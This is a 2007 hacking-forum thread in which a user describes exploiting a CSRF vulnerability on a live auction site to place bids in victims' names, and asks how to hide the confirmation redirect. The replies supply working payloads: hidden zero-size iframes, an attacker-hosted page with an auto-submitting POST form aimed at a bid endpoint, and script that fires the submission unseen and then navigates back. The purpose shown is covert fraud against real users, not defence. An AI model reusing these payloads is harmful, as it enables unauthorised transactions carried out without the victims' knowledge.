Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A on cross site request forgeries and breaking into sessions. It's one of the attacks that XSS enables and the attack of the future. For Session, fixations, hijacking, lockout, replay, session riding etc.... 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
CSRF question
Posted by: Anonymous User
Date: May 30, 2007 01:40PM

I found a CSRF vulnerable site. It's an auction site, kind like ebay. Session riding is effective only when POSTed, but I've managed that with forms and simple JavaScript (found in WhiteAcid's XSS POST forwarder) that submits form automatically. Almost perfect... the problem is that every time the bid is placed via CSRF the user gets redirected to a site which informs him/her that: "...the bid was placed successfully and bla, bla, bla..." Is there any way to circumvent that redirection or at least to control where the user gets redirected.

Options: ReplyQuote
Re: CSRF question
Date: May 30, 2007 04:44PM

Have you tried using a hidden iframe?

Options: ReplyQuote
Re: CSRF question
Posted by: Anonymous User
Date: May 30, 2007 08:28PM

Damn, I completely forgot iframes :) Thanx for reminder CrYpTiC_MauleR. It works like a cham...

Options: ReplyQuote
Re: CSRF question
Posted by: hackathology
Date: August 21, 2007 05:05AM

guys, can show an example with hidden iframe? I am pretty lousy at this man. I need examples to enlighten me. Thanks in advance

http://hackathology.blogspot.com

Options: ReplyQuote
Re: CSRF question
Posted by: tx
Date: August 21, 2007 01:52PM

<iframe width=0 height=0 src="h++p://attacker.com/form_post.html" style="visibility: hidden"></iframe>

where form_post.html contains the self submitting form:

<form method=post id='a' action='h++p://victim.com/bid.php'><input type=hidden name='userid' value='342'><input type=hidden name='bid' value='140'></form><img src onerror="var a=document.getElementById('a');a.submit();history.go(-1)">

I'm assuming at least that that's what CrYpTiC_MauleR and /nul were referring to

-tx @ lowtech-labs.org

Options: ReplyQuote
Re: CSRF question
Posted by: Anonymous User
Date: August 21, 2007 03:57PM

Actually I did it almost like tx described:

Page bid1.html contains:
<iframe src="bid2.html" style="width:0px; height:0px; border:0px"></iframe>

Where bid2.html contains POST parameters:
<form name="csrf" method="post" action="http://www.mybidsite.com/index.php">
<input type="text" name="param1" value="my bid">
<input type="text" name="param2" value="1 USD">
</form>
<script>document.csrf[0].submit()</script>

Now, all you have to do is redirect user to bid1.html :) In my case it worked like a cham. I am really amazed that (some) people doesn't take CSRF seriously...



Edited 1 time(s). Last edit at 08/21/2007 04:00PM by /nul.

Options: ReplyQuote


Sorry, only registered users may post in this forum.